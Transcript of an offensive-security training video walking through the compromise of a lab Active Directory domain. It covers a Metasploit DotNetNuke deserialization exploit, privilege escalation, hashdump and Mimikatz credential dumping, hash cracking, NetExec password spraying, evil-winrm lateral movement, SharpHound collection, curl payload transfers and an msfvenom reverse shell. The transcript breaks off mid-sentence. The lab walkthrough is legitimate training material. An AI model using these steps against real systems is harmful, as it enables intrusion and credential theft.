Hello everybody, and welcome to another module with Startup.Security. My name is Siren. This is module 11. And in module 11, we're actually going to be targeting the arc.corp domain, which is present in the Kinetic lab range. We're going to be making use of utilities like DotNetNuke, SharpHound, Mimikatz, Chisel, Proxychains. It's gonna be pretty loaded. So buckle up, and here we go. First things first, let's go to our authorized scope. We're gonna head into for me it's 10.65.1.7. Go to targets. And the machine we're gonna be targeting is FemmeFetale. I'm not sure how you would pronounce that, but this is gonna be the first machine. Pivoting is not necessary for this machine, but we do need to compromise it. And that's 10.65.20.29. So I've already prepared my cherry tree. You'll see that I have FemmeFetale, DCArc, DCZERO, and I'll go through this process here and show you why I highlighted what I highlighted for each of these down the line. But for now, we're focused on starting fresh here with FemmeFetale. So what we're gonna do is scan it down. nmap-pn, right, -st-sv-a at this IP with a tac min rate of 2000 to speed up that scan, and we're only interested in open ports. I'm gonna say we'll scan all 65,535 ports and then smash the return key. This scan is gonna take a little while. Feel free to pause the video, whatever's necessary. I'm gonna pause the recording here, and I'll snap my fingers when we're back, and we'll get that loaded into Cherry Tree. Okay, done. Let's go ahead, you know the drill. We'll copy everything up through nmap scan report, bring it over into Cherry Tree, and paste the results. We're gonna do some quick highlighting. I'm gonna get rid of the redundant stuff up here at the top, little snip there, a little snip here. Gonna drop that as well and bring this in nice and concise. So we have port 80, oh, that highlights blue. One moment, let me fix that. We have port 80, we have our target IP, and then we have 135, 139, 445, 5985, and some higher ports here. Excellent, excellent, excellent. So 80 HTTP, looks like there's a website, some NetBIOS happening here, and then Microsoft HTTP API. So things like evil WinRM come to mind here. But let's go ahead and load up. If you don't have it, go up here and just type in Burp Suite, load up the Community Edition. And that's actually what I need to do. I'll do it with you. We'll go to Burp Suite. I thought I had it loaded. We'll go to Burp Suite Community Edition, load that. And I'm gonna delete the previous. Next, start Burp. And we're gonna work with Burp Suite's built-in browser. We're gonna go to Proxy and open browser. Cancel on these. And why are we doing this? Why are we doing this, Siren? What's going on? We're doing this because often the largest attack surface in the world is the web, right? It's the web. So in this particular case, that's exactly what we're going after. The web surface. Port 80, 443, 80, 88,000, 10,000 webmin ports. 10,443. You know, it could be any of those. As long as it's an HTTP serving port, we're on it. So what we're gonna do here is punch it in. And we are presented with a website here. Pretty awesome. Model Nexus 6. Welcome to the project page for Operation FemmeFetale. FemmeFetale LLC, our mission is to push the boundaries of artificial intelligence and robotics to create the ultimate assassination tool, the Fembot. Our Fembots are sleek, seductive, and deadly. So a lot of story here. Really cool story stuff, right? And we can click on each model. And there's a login feature, a register feature. We can search, presumably. And it is loading, yes. So we can search through here. I mean, I see a parameter like this, and I think, is this prone to HTML injection? It might not be. It might be sanitized. Yeah, but it is a reflected value. Unfortunately, nothing really much there. We could take this apart to the teeth. There are a lot of rabbit holes on this site. You could register, log in. There are many rabbit holes. But there's something that we need to consider when we're assessing the web surface, first and foremost, and that's the back end. That's why you see in my note up here, in my notes, we have web technology, the web stack, what's it running, you know, so on and so forth. And we can do that really just by alt-tabbing back into Burp Suite, turn on intercept, and just refresh a GET request to the home page. We're gonna right-click that and send that to repeater. Again, we're just right-clicking, sending that to the repeater. And if you turn off intercept, that'll forward out all the rest, like all the other requests. Then you can hit send. And we need to analyze the headers. You know, what's going on the back end? What are they sending back at us? So Xframe options is not set to deny. It's set to same origin, XUA, compatible, IE equals edge. I'm not seeing anything that's giving out any, you know, too many sensitive technologies or anything like that. Like, we don't know whether this is really Apache. Wait a second. Hold on. Yes, we do. Look closer. DNN. DNN. And if we scroll down here, you'll see what we have. The DNN platform. What is this? DNN software. I'm gonna Google that. DNN software. Content management system. So we have a CMS. Let's let that load. Okay. So we have our content management system. Great. Seems that they've improved upon it. Now they have DNN and AI Copilot. Some really cool stuff there. But to anybody like myself, or anybody, if you've been a system administrator for a while, you'll know what .NetNuke, well, DNN really is. And you'll see it right here. .NetNuke. Well, .NetNuke got nuked a ways back. And there's a remote, it was a very, very big CVE back in the day, and vulnerability, exploit, bit of weaponized code, called the .NetNuke RCE. And it took down a plethora of websites that utilized the DNN, CMS. I apologize if you hear my cat in the background, meowing. The cat only knows what's possessed him. He's got food, he's got water, he's got catnip and toys. I think he was staring at his shadow on the wall. Not to get too sidetracked, but nonetheless, I love my cat very much. DNN, so yeah, .NetNuke, little intermission there, apologize. We're back to .NetNuke, .NetNuke RCE, and what we're gonna do is we're actually gonna load up, you might be thinking, whoa, Siren, what is this? This is known as Cool Retro Term, and I am proud to say that it is now a part of the repository. So you can sudo apt-get, if you want this, apt-get and install-yes, Cool Retro Term, and then you can launch it. Cool, no fancy, we used to have to go through a plethora of things to get this installed, but Cool Retro Term, and then -- full screen. I'm using it for demonstration purposes, but that's about it. Nonetheless, let's go ahead and load up MSF console. Let's get the MSF framework loaded up. And once that's loaded, there we go. Let's search for DNN, .NetNuke. And there it is. exploit Windows HTTP DNN cookie deserialization RCE. Deserialization, remote code execution, rank is excellent, and we're going to use it. So use 0, options, and we now need to set the rhosts. So set rhosts. We need to grab that IP, alt tab back into cherry tree, copy that, and paste it. And we need to set our listening IP as well. So I'm going to type ifconfig on Tunnelref, copy that IP address, and load that back in. Set L port, or we'll set the L host to this, clear options, and boom. There we go. So it did not set the L host. Set L host to this, options. There we are. So L host is set and everything looks great. What we'll do is set the L port. No, we'll leave it the same, but we are going to set the exit function to thread. We don't want it to exit through a process. We want it to we want the code execution to exit through a thread. It's safer this way, leads to less crashes, it's more stable. And with that being said, we're ready to type run, and fingers crossed, sending exploit payload to the /URI, sending stage, bling bling. We just got a shell. We got a shell back as IIS app pool DNN or .NetNuke. Excellent. So now let's try and drop into a shell. And we're in C, Windows, System 32, iNet Serve. Where do we like to live? Where's a world-writable location? Where does a hacker live on Windows? Where does a hacker live on Windows? That would be C, Windows, tasks. Because it's a world-writable location. So we're going to cd into C, Windows, tasks. I'm going to clear, well, I can't because of the terminal, but nonetheless, what we're going to do is type net users. And there we go. Okay, so we have guest, administrator, default account, Drome, all looking pretty good here. All looking pretty good. I also like to type whoami /priv. And we have SE impersonate privilege actually enabled, so we can get NT system authority pretty effectively. Now, what we need to do at this point is actually gather credentials from this machine. I mean, we can cd back a little further, type directory, cd to users, type directory, and you will see that we have a plethora of users here. Zonia, Renala, Public, Kizzy, Hermes, Freya, Drome, and Clover. Awesome. Let's go back to C, Windows, tasks. And what we're going to do is utilize curl, or the curl transfer utility, to kind of help us out here as far as getting Mimikatz over on the machine is concerned. We can do that, or we can use Meterpreter. I'm going to hit Control-Z, and we're going to background this session. I'm going to type lpwd. This is the same thing as typing pwd on your Kali Linux machine. It is no different. Hence the L for local. That means that as far as our environment variables are concerned, we're still located in the kinetic range. Let's change that up a bit. Let's LCD into targets, and let's Alt-Tab back into Terminator for a moment. We're going to go back into targets, and I've created one here already called FemmeFetale. You'll see it's right here, FemmeFetale -10.65.20.29. So let's cd into that. And you see I've got my standard structure. We've got our standard structure here, right guys? Files, any files that we come across, any exfiltrated information, any vulnerabilities, such as the .NetNuke deserialization remote code execution vulnerability would go in there, right? If we had that in a Python script or something like that, or Perl or whatever it might be. And then we have users, passwords, hashes, and so on and so forth. Wonderful. But I want to kind of make a new directory for this range. What I want to do is make a directory called bins, short for binaries. And let's cd into bins. I'm going to locate memecats.exe, and we're going to bring that over here. That way we can have a centralized place to transfer everything. So just wherever it is on your machine, copy it to this location. We want to have a centralized location for these types of executables. Memecats is the primary one, but additionally, you are going to want to utilize something known as SharpHound. So I'll provide this, but this is what you need to download here, SharpHound version 1.1.0, so that it works with our version of BloodHound. This is important. This is important information. Otherwise, if you run the more recent version of SharpHound, then it just won't work. So in here, make sure I'll load it up even here. I'll include this in the resources as well, but make sure you download the executable binary for SharpHound version 1.1.0. That is SharpHound version 1.1.0. And once you have that, we're basically ready to move on. The next thing that we're going to need is something called Chisel, but let me locate sharphound.exe and copy that to this centralized location. And then we're going to need chisel.exe, so I'm going to locate that, and we're going to copy that to here, so that we have Chisel, SharpHound, and Memecats located out of our bins directory for our authorized target here, the Kinetic range. And you want Chisel as well to be on a specific version. Specifically, with Chisel, you want, so here's SharpHound, you want version 1.1.0. No surprise, but this is not intended. You actually want Chisel version 1.10.0 as well. Now we're working with Windows machines, right? And they're 64-bit. Scroll on down to the bottom and make sure you download Chisel 1.10 Windows AMD 64.gz. In fact, I can kind of just show you how to do that. I'll download that for you and show you. We'll copy home Kali downloads and Chisel 1.0 underscore Windows, where is it? 1.0, 10, or 0.0 to this present directory. And if you don't know how to uncompress this file, just use gzip-d, that's deflate, on this, and you'll get back your chisel.exe. So Chisel is going to be important because we're going to be utilizing that later on for pivoting into internal and network-segregated environments. So with that being said, let's go ahead and continue on here. We have Chisel, SharpHound, and Memecats. What about in Metasploit? LPWD, we're in targets. Let's LCD back one and into bins. And then LPWD, we are in home, Kali, engagement, kinetic range, bins. And if we LLS, you might have guessed it, LS, local LS, you'll see that we have SharpHound, Chisel, and Memecats. So where are we on the target machine though? If we type pwd, present working directory, we're in C, Windows, System32, inetserv. Moving out of the local commands now, just into regular commands, we're in the inetserv directory. As hackers, where do we like to live? CD to C, Windows, tasks. And then you can ls out everything here. There's nothing really of note here. But we need to put SharpHound, we need to put Chisel, and we need to put memcats. So we're going to type upload SharpHound.exe. And you can really, you could upload this way. You could upload SharpHound, you could upload Chisel, you could upload memcats. This is one way of doing it. I do kind of want to show another way of transferring files though. So let's say we'll do half and half. Well, there's not really half here, but let's upload SharpHound with Meterpreter. As such, let's let that upload. There it is. That's simple. That's file transfer with the Meterpreter shell. Suppose you don't have the luxury of a Meterpreter shell and you need to be able to perform file transfer. Well, let's drop back into a shell. And suppose that we don't have a Meterpreter shell, that we just have a regular command line terminal. Well, first off, here is our SharpHound.exe. So we have our SharpHound here. It's present out of C, Windows Tasks, that World-Writable Location, right? And say we wanted to transfer over Chisel and memcats. It's actually very simple. All you have to do is use a simple HTTP server. So I'm going to cat my bash RC and grep-i for simple HTTP. Please have this in your own bash RC. I'm going to copy this over and make sure that this is a resource, right? Because that's really what it is it's a resource. And well, yeah, it's a great one to have. That way you can be in any directory like bins or a transfers directory. What it does is it types ifconfig ton0, it greps for inet so that we get our IP address back on our ton0 interface, on our VPN interface, and then opens up python-m http.server. So that means we're starting a web server out of the bins directory. So transferring becomes as easy as typing, seeding into the directory where you want the files served from and typing simple HTTP. It could not get easier than that. Control-Shift-O to open a new terminal. And we still need to bring over Chisel and memcats. So I'm going to copy this IP, and let's go back to our regular shell, and I'm going to curl HTTP, paste this in, port 8000 /chisel.exe. Dash output, or dash O for dash output, is ./chisel.exe. And we'll let that transfer. And this is how file transfers are done. If you're coming from the blue side of things, you might notice to be on the lookout for these types of file transfers. These are lay off the land binaries like curl that we can use to, these come pre-installed with Windows is what I mean to say. And we use these to transfer files. Usually the process is download, permit, execute. That is download, permit, that means make it executable, and then execute, right? So here we are, dir-a-o-q, and we have chisel.exe, sharphound.exe, looking mighty pretty, looking mighty pretty. Now what we need to do is curl http :// on port 8000. There was another binary there, /memcats.exe. -o is ./memcats.exe. And just like that, we've used something that comes pre-installed with Windows to perform our file transfer for us. It doesn't have, curl doesn't just have to be something that's used to view web pages, right, from the command line, or to, it can also be used to download and transfer files. And that is what we've done. So first things first, let's get down to cracking credentials, extracting credentials, cracking credentials with memcats. And if we recall, when we typed whoami/priv, the SE impersonate privilege value is set to enabled. But before we can use memcats, we need to be administrator. And right now, if we type whoami, we're IIS apppool DNN. remember that we can type whoami/priv. And we have SC impersonate privilege actually enabled on this machine. That's a critical mistake on behalf of the defense. So what we're gonna do is hit Control-Z and then yes to background this, and we're gonna go back to our Meterpreter shell. Get UID, and we are IIS at pool DNN or .NetNuke. We can just type getsystem with Meterpreter, and this is gonna elevate our privileges on the machine. We just give this a moment. Got system via technique 5, named pipe impersonation. Excellent. Print spooler variant to be more specific. But with that being said, now we type get UID and we have NT authority system. So that's a step above the administrator. And what we're gonna do is type #dump. This is a command that comes present with Meterpreter, and I love Meterpreter. We can type #dump, and we get credentials back for Jerome. And, well, where does that go? I'm gonna copy that, and we're gonna put that into our hashes file. So I'm gonna right-click, copy, if it lets me here, or I can just select it, Control-Shift-C, and then we're gonna go out of the bins directory. Let's go back to our targets. FemmeFetale, nano hashes, and paste in Jerome. Great. So we've got one hash, which is excellent. We can cat hashes, and there's Jerome. Let's go back to our Meterpreter session. And what we're gonna do is drop into a shell and CD to Windows tasks, where we have Chisel, Mimikatz, and SharpHound. We're gonna execute mimikatz.exe, privilege, : debug, token, : elevate, if we're so lucky. But that provides us an NT authority system context. And I can bring the font size down here a little bit. But now we're gonna type lsadump cache. Beautiful. Now we have the credentials that we need. So we're gonna copy all of these. So even where #dump doesn't come back, I'm gonna hit Control-Shift-C. That's Control+Shift+C to copy that. Alt-Tab. Even if #dump, our #dump command, even if that doesn't come back, we can always try things like lsadump cache inside of mimikatz.exe. Always, always. Exhaust your options. I can't stress that enough. In engagement, you want to exhaust your options. We do have this server running up here. I'm going to, let's see here. I'm going to leave that on just for the time being and bring this up. By the way, you can use Control-Shift down arrow and Control-Shift up arrow inside Terminator, and we can bring that pretty much up and off the screen. Now if we cat hashes, we only have Jerome. Let's add this in here, just everything we got, and boom, there's all of our hashes. I'm gonna Control-X, Y, enter. That's Control-X, Y, enter. We're gonna clear this out and cat hashes, and boom, we've got the MS cache version 2 hashes, and they're all present with us right here. So now that we've got our hashes, we need to format them for cracking. Now you'll notice we have 2 hash types here. I'm gonna actually take Jerome for the time being. I'm gonna take Jerome and we're gonna copy that, and I'm gonna Control-K to delete that line, Control-X, save, yes, that's fine. I'm gonna touch a file, it doesn't matter, just #Jerome, because this is a different hash type, right? And when we load it into a file like hashes, the file hashes is meant to be a file that you can run John the Ripper on, or Hashcat, and everything is formatted, correctly so that we can just type John hashes. Now, the type of credentials that we just exfiltrated is known as the MS cache, or more specifically, the MS cache v2 hashes. What does that mean? That means we need to format them in a way such that it can be interpreted properly by Hashcat or by John the Ripper. So we're gonna nano hashes, and I'm kind of just gonna go back over this. We went through this in a previous module, but it looks like this. Username, and then we need a colon, $DCC2, $, and then the RID value, and a 0, and then a pound sign, username, pound sign, hash. That is the format that these need to be in. Take a moment to look at it, jot it down if you have to, but pause it, whatever. That's the format that these need to be in. I'm gonna pull a demonstrator card and kind of just bring over everything that I already have, and you'll see what I mean. So you're just gonna see me pull the demonstrator card on this, and I move all of these hashes over to this format. Username, colon, $DCC2, $, the RID value, which was present there, plus a 0. You have to add the 0 on the end. And then pound sign, the username, pound sign, and then the hash itself. So now we're ready to start cracking these hashes. Let's hit Control K. For FemmeFetale, not only have we owned the machine relatively quickly through the weakest attack surface ever, the largest attack surface ever, the web surface, but through one of the easiest findings, all we did in Burp Suite was actually just send along a GET request, and we were able to enumerate that it was running .NetNuke. But we'll go over all of that in a bit. So now if we cat hashes, here we are: Zonia, Freya, Clover, Kizzy, Renala, and Hermes. So we're going to type John on hashes, -- word list is equal to user share word list rocku.txt, and then smash the return key. And fingers crossed, yes, there we go. So we've got not just system compromise, but we've also managed to exfiltrate the credentials with hash dump and with mimikatz.exe. And don't forget, we still have our Meterpreter session here as NT authority system. We still have the ability to drop into a shell. And that's awesome. So we're gonna go ahead and let these crack. Let's see, we had Renala, Kizzy. So 1, 2, 3, 4, 5. Yeah, we got 6 of these that need to be cracked. We're just gonna kind of sit back, relax, and let them crack. Should be just one more. Let's see, 1, 2, 3, 4, 5. Yep, one more if we get lucky. Then we'll be able to crack the 6th hash. What I'll do is pause on my end and snap when it's done. So it doesn't look, I've waited here for quite some time, and it doesn't look like that other hash is going to crack, but that's okay. If you wanted to, you could run it through Hashcat. We're using John. I don't have much processing power because I like to show that you don't need a beefy machine to be able to perform penetration testing. But that aside, let's go ahead and open a new terminal with Control-Shift-O. Let's nano users. And we're gonna put in here Freya, or Clover, let's do it in order. Clover, Freya, Renala, Kizzy, Hermes. We got back a lot of users going after the arc.corp domain in the Kinetic network. We've gotten back a lot of users already. I mean, one of these, at least 1 or 2 of these has got to prove useful. At least we can hope, right? Especially since we have their plain text credentials now. And then let's nano passwords. And Starlight, same order, top to bottom. Mountain, Moonbeam, Airwolf, and Red Cloud. Control X, Y, enter. We can clear the screen, list everything out. Cat users, cat passwords. Beautiful. Now, if you've been familiar thus far and you should be doing these modules in order, what are we going to do now that we have a set of users and we have a set of passwords that are already cracked? We've cracked the hashes, we've got the users, we've validated the credentials. What are we going to do? NetExec. The correct answer is NetExec. So I'm going to clear the screen, and I know I clear the screen a lot. If you're starting out, you don't have to clear the screen as much as I do. I just like a fresh looking terminal for each set of steps that I do. Everything I do is very methodical, and when I clear the screen, it's because there's too much going on, and it helps clear my brain out a little bit just to be able to start fresh with what we have, and it builds on memory as well. So let's go back to our Intel dossier here of machines that are in scope, and FemmeFetale is compromised. We can even go over into Cherry Tree, and with Cherry Tree open, we're basically good here. We can mark this as owned, and yeah, but that was on the .20 range. Remember that our initial scan, this is a key component. Our initial scan was .1, .15 through 25 or 255. On the 4th octet, we scanned down dang near like 200 plus machines or potential DHCP configurations for each machine. Well, now we're looking at FemmeFetale, and that's on a .20 range. So, if you were a guessing person, what might we do with those credentials? And I'll just do some highlighting here. I'll let you think. What might we do with those credentials now that we actually have another octet? We're on the 3rd octet now, and we've verified machines that exist in the .20 range. .20 this could be 0 through 255 or /24, right? Right. So let's go ahead and cover the 20 range with those credentials that we got from FemmeFetale and see if this Class C, the area that I have highlighted, remember this is Class C, this is Class B, and this is Class A. Or you could say, again, this is Class A, Class B, and that 4th octet, a Class C range. Well, we're interested in the of the Class B that is .20, we're interested in the scanning down the Class C, which is going to be really anything 0 to 255. And with the power of NetExecute and some password or credential spraying, we can achieve that relatively quickly. Now that we've exfiltrated those credentials, we can say NXC, and let's check SMB on 10.65.20.0 through 255, and we'll say as the user, any particular user? Nah, check this out. You can actually just pull from the user's file, and NetExec knows automatically what you want to do. It's saying, oh, they want to do kind of like brute forcing, but credential spraying across a range. They want to check for valid SMB users. Okay, so that's what we're going to do. And I'm going to tack on -- shares. Let's see who has compromised what. We'll hit the return key and kind of let this rock and roll. I'm going to bring in the font size here. There we go. So that's a little more legible for you, a little easier on your eyes. And we got lots of login failures here on DC Arc. Unfortunate. Come on, baby. Fingers crossed. There we are. There we are. So, okay, there we are on, yes. All right, so there's FemmeFetale. We already know that that was owned, right? We already know that that machine was, oh, and we're going to get some errors back. Sometimes NetExec does that. But the point, just ignore those for the time being. But what we really have is the ability here to SMB in to FemmeFetale anytime as the user, as the user Clover and Starlight. Clover and Starlight. So this time, instead of checking for SMB, let's switch up the protocol. We know that we can access a share as Clover and Starlight on FemmeFetale, but we're interested in code execution. So I'm looking at LDAP, I'm looking at WinRM, and the IP range of 10.65.20.0 through 255. User, same thing, passwords. And let's see if we can WinRM execute anything like -x, who am I? And fingers are really crossed on this, because if we can, there we are. So on FemmeFetale, actually, as Clover, we can WinRM in. That's useful. Boom, DCZERO, we can WinRM into DCZERO as well. And that is awesome. That is awesome. Anything else? Anything else? So we've already executed, zero who am I came back on FemmeFetale. We executed who am I and got 0 Clover. On DCZERO, we came back and we got 0 Freya. So that means we can copy this. Oh, and that was as Freya. Here it is, the one that was marked as pwned. It's Freya and Mountain. So I'm gonna go back to my enumeration. I'm gonna go to DCZERO, right? 10.65. Let's bring this in a little bit here. Let's bring it in. 10.65.20.30. Users and passwords. And this, or I really like to call this potential users, in case we find anything that looks like a user. And then, but we have full-on credentials here that we compromised from FemmeFetale, and we're just we're moving laterally across the network. Freya, Mountain, and in context, this is WinRM. What's that mean? It means we can utilize and abuse port 5985, Microsoft HTTP API, to authenticate as Freya and execute commands. And then similarly on FemmeFetale, we have potential users credentials. We have, well, it was Clover and Starlight. So at any time, we can evil WinRM into these and have a shell on either of these machines. And we just got started. That's pretty nice. That's pretty great. And this is all for the arc.corp domain, which, by the way, is also something that we need to cover. But let's go back to FemmeFetale for a moment. Oh, seems our Meterpreter session died. That's okay. I'm just going to run the exploit again, get a shell, you know the deal, get system. And there's something that I want to cover on FemmeFetale before we go through this. We got our foothold, right? We've got a foothold on that machine. And that's great. That's important. But now we also need to take a look at the network. Always take a look at the network. And what we're going to do is type get UID. Let's verify who we are. All right, let's go back to being NT system authority. Drop into a shell. I'm going to cd just to the / directory. And what we're going to do is, we have full administrative control over this machine. You can add yourself as a user, start remote desktop, browse around it as much as you want, get into the story if you want to. Browse around, look at the scripts, look at the files, and all of that jazz. Really do so. It's a lot of fun. We type net users, we type who am I /priv. We type task list /verbose or just task list to see which tasks are running. And we type dir a lot as well, some of the common commands. But what about netstat-ano? Being able to see what's listening here. Well, this looks similar to our nmap scan. Is there anything here that's running off of the loopback adapter over TCP? No, that's UDP. So nothing really hiding from us on TCP. What else can we check with? ipconfig, everyone knows this. Often it's their first command that they type from a Windows command line interface. And we have our IPv4 address for FemmeFetale, host name, FemmeFetale, 10.65.20.29. If we type ipconfig/display DNS, then we get a lot back in terms of our networking information, which is pretty awesome, by the way. So I'm going to copy this information. I'm going to copy this with Control-Shift-C. I'm going to bring this over to FemmeFetale. In fact, under arc.corp, I'm going to add a new subnode and call this networking. And I'm going to paste this in here for later review. This is just for later review. What about any machines that came along that ever touched this machine on that third octet of .20, right? And we're on, type ipconfig, 20.29. Which came through and which touched 20.29? There's a really simple command that you can type, art-a. Check the art tables. And we're going to copy all of these, art-a, and we're going to put that in here as well. So here's all of our .1 machines, right, that came through. A lot of these we're familiar with from our active Recon scan, a lot of these machines. But, you know, there are a few here that stand out. For one, this stands out. And then for two, .20.20, .20.30. Well, we know what .20.20 and .20.30 is. Here's .20.30, DC arc, here's .20.20. So this kind of just helps provide a visual perspective of what's going on from a networking point of view, right? This helps with that. But there is another thing that we had that we really want to, before we move to, and I know you guys are jumping at it, you want to compromise DCZERO. I know. You're absolutely jumping at it with Freya and Mountain. And if you want to, you can pause and do that, but I encourage you to stick with me. Because when we compromise an Active Directory machine like this, it's important that we make an attempt to utilize something known as SharpHound. SharpHound is basically BloodHound, but think of it instead of like a bunch of teeth being scraped across the network, like from a hound, SharpHound is like a razor blade meant for a single machine. And it's really even easier. All you have to do is type ./SharpHound.exe-c all. Check for all. And that's it. Let's allow it to do its job. And what we're going to do is then exfiltrate this. And with any luck, we'll be able to get information over into BloodHound of a more verbose nature. So let's see how this goes. And I'll go ahead and kind of just... Oh, it looks like information LDAP channel closed. Waiting for consumers. Let's see. 0 objects. Okay, so it didn't find any objects here. You know, this is important. This version of SharpHound is compatible. But it's important that we understand that you can run SharpHound on here. I mean, it is something that we have here. We have 76 named SID mappings, 4 SID to domain mappings as well. And if we type dir, we actually did get back some information. Let's exfiltrate that. I'm going to hit Control-Z to background this, LPWD to make sure I'm in the right place. I'm going to LCD into targets, LLS, LCD into FemmeFetale. And what I'm going to do is download, instead of uploading, I'm going to download it from the remote machine in here. And to be even more specific, actually, we're going to LCD into Exfil. This is where it would really belong. If we LLS, you'll see there's nothing in here. No entries exist. But we're going to download this file. and we're gonna get it uploaded into, the system cannot find the file specified. Hold on, ls. Oh, we need to be in tasks. That would help. There we go. Let's download that. Downloading it. And now if we go back to BloodHound, we can Alt-Tab back into your BloodHound as we had it, guys, as we had it, right? And then go to Upload Data. And let's go to, I have my engagements here, Kinetic Range. And then we'll go to Targets, FemmeFetale, Exfil, short for Exfiltration. And we've exfiltrated some BloodHound information. So also in this video, we're covering not just executing BloodHound, but getting that BloodHound information as extra read all about it into BloodHound, and you're gonna see what this does. We're gonna hit open, and we're gonna allow it to upload. Remember, if yours is not uploading, you're using an incorrect version of SharpHound. Make sure that your SharpHound version is compatible with BloodHound. But if you use the link covered in the below resources section, you'll be covered. You'll be fine. It'll work. So there's that. And I'm going to go over to database info, and I'm going to hit refresh database stats. And let's go ahead here and say that I want to look for, I don't know, what do we want to look for here? Actually, it wasn't ADRef. I actually had this in its respective file, blood reference. So match in computer return in, right? And let's take a look at what we get back here. Let's take a look and let's blow up BloodHound. So if we blow up BloodHound, we should see if we look around here. There it is, FemmeFetale. Here's our new little friend. We've identified it. We've done our nmap reconnaissance. We found the machine on the third octet is .20.29. We found an open web port on it. We compromised .NetNuke. We got in. We used the set impersonate privilege and token elevate to elevate ourselves into administrator. We used Mimikatz to exfiltrate the credentials. We ran SharpHound on it. And now if we right click this and go to shortest paths to here, look at all the information that we got off the network. You'll notice it's quite a bit more. So, now that we have all this information off of the network, look at what we got. We've got Zonia. Zonia is looking pretty cool. If I were to continue on arc.corp, I'd be interested in Zonia, absolutely. Absolutely. Zonia is a member of domain admins. What other groups are here? Account operators. Nice. But I'd be interested in any and all. Look at how this is a good and amazing visual. Everything we've done in every module has been in Kinetic.corp. But now that we've run SharpHound, that's trusted by Kinetic.corp, right? Arc.corp is trusted by Kinetic.corp. This is an entirely separate domain. The Arc.corp domain. And look at how many machines, look at everything we've been through with Kinetic.corp and all those other machines, right? And the user Jane and zero logon and all that loot that we got. Well, off that, we've discovered in this internal network assessment another domain that was just sitting there. And we would never have found it if we didn't do a Class B scan, or what's known as a Class B reconnaissance scan. You can actually find how to do a Class B scan on my own website. I have a resource just for students, basically Class B made easy. It's a blog post at sirensecurity.io. Feel free to check it out and tell your friends. It's an excellent resource. But nonetheless, we would never have found the arc.corp.domain or arc.corp unless one of two things. There had to be two conditions met for us to find FemmeFetale in the first place. Could have been any machine. One, we were pre-authorized in our target scope by a stakeholder, and the IP address of that third octet .20 was already given to us, so we knew there was something sitting there. Or two, you have to do some reconnaissance and what we refer to as host discovery scans. You don't want to tack on many ports, just the top ports that are utilized, only a handful of ports, and go through a Class B scan because that can be 60 to 70,000 machines. It's a lot. Nonetheless, that is the importance of being able to do your reconnaissance and an internal network assessment, because now we have the arc.corp domain entirely separate from the kinetic.corp domain. Just something I thought I would mention there. Now we're ready. I feel like we've covered that. I feel like we're doing good, but now we are ready. Or, yeah, let's go ahead and do it. I know what you're thinking. Siren, no, let's just evil WinRM in. Okay, fine. Let's do it. We've compromised DCZERO, and we've got Freya and Mountain. How did we get this? Where did that come from? NetExec. WinRM to be specific. NetExec, WinRM, Credential Spray. And I believe if we really want to keep this here, it's NXC WinRM, right? And then it was 10.65.20.0 through 255-user-users-p passwords and -execute in the event of compromise. This basically says in the event of credential compromise, execute who am I? And we got this back. We got back Freya and Mountain. So we're going to go here and we're going to type evil-winrm. To abuse this, we're going to type evil-winrm 10.65.20.30 as the user Freya and the password Mountain. We're going to smash that return key. Oh, I forgot an argument there. See, even I forget arguments. But there you go. -I for the IP address. And there we go. We've got a shell. That's lateral movement across the network via WinRM, which is pretty predominant these days, actually, as that service grows in popularity. Net users. Oh my goodness. Do we have credentials to hack and crack or what? You know the commands I like to type. Who am I /priv? Did the sysadmin forget to configure SE impersonate? Yeah. Net user Freya. Are we already, or we're a member of domain users and the covert crew. All right, awesome. This is good. But WinRM, evil WinRM has some extra potential, kind of like Meterpreter does, upload and download functionality. I'm going to exit this shell. And I'm going to go into our bins directory. If we go back to our targets, back to kinetic range, and cd into bins. Why am I doing this? Because I want our local present working directory when I evil WinRM in to contain the goods. That way we can get a shell. We live out of C, Windows, tasks, and we can upload memcats.exe. Uploading. And we'll let that go. And we can upload Chisel if we needed to. We can upload SharpHound if we needed to. We're just going to upload memcats though for the time being. And that is an upload success. Let's go ahead and try and execute. Let's do ./memcats.exe. And the only reason, I know you're saying, are we user, are we an administrator? Well, I'm not sure whether or not, if we look at net users, right? And we look at net user Freya, they are a member of something they call the covert crew. And they're a domain user. That's fine. That's just an ordinary AD domain user. They're an Active Directory domain user of the arc.corp domain. That's nothing special. But they are a member of a global AD group called Covert Crew. And if that has administrative privileges over any of the AD forest for arc.corp, then we should be able to execute memcats privilege debug it's worth a shot. We're going to do ./memecats.exe. And we've run into quite a few issues here. Okay, so not that stable of a shell. I'm going to have to go ahead and Control-Z this. That's okay. We'll clear the screen, kill all, -9, evil-WinRM. Make sure you don't have any zombie processes sticking around. Let's get a more stable shell while we're at it. Let's say that's not too stable of a shell. Maybe we want a Meterpreter shell. We can't use our one Metasploit card, but as far as I'm concerned, we can use as many exploit multi-handler as much as we want. Right? That's the general premise here. We can use exploit multi-handler as much as we want. So if this was your exam and you used .NetNuke, and definitely check this over with the proctors or whatever in your, certification. I'm not here to speak for them at the time of this recording, but I've done my research, and it says that on the exam you are permitted to one Metasploit payload of your choice. Now, once you use it, that's said and done. If it doesn't work, no dice. So make sure you choose wisely. However, you can use unlimited exploit and post and auxiliary modules. More specifically, the one we're interested in is exploit multi-handler, because there's nothing wrong with having a Meterpreter shell. In fact, in the real world, if you're not using Cobalt Strike, Meterpreter and the MSF framework is an amazing C2, or what we refer to as command and control. So, with that being said, let's go ahead. I'm going to type VenomRef for my Venom reference. This is available on my website at startup.security.io. I'm going to just copy a typical Windows x64 payload here. I'm going to type ifconfig on Tunnelref. Make sure our IP matches up. Feel free to pause if you need to, but 172.20.0.84. And we'll leave the port as 443. Yeah, 443. Dash format as executable, output as siren.exe. And let's hit the return key. That is Windows x64 Meterpreter reverse TCP. Go ahead and copy this. Go back into Metasploit, and we're gonna type background to background our shell. We don't want to lose it. Just type background, and then you can view that it's there. Sessions-L to list them out, and it seems we have a redundant shell actually. And oopsie, what we can do is sessions-K3, and you can terminate that session. So now we sessions-L, and we still have our NT authority system running on session ID 4. Awesome. Back, and we're going to use exploit multi-handler. We're going to clear the screen, and you'll see that that is exploit multi-handler. Type options, set lhost to, well, our IP address, which is, for me, this is going to be different for you, 172.20.0.84. And set the payload. This should be on your clipboard. You can just, this is the one that you just used from MSF Venom, right? So this is the one that we're demonstrating here, Windows x64 Meterpreter reverse TCP. And we'll set that payload, and then we can type options again and set the L port to match. What was the port? 443. That was 443. So set the L port to 443. And remember Siren's trick here, set exit func. Take it from me. I've done some 32-bit binary exploitation. Exit func equal to thread, not process. It's more stable, and it'll prevent, more often than not, it'll prevent services from crashing and being inaccessible the next time around. So 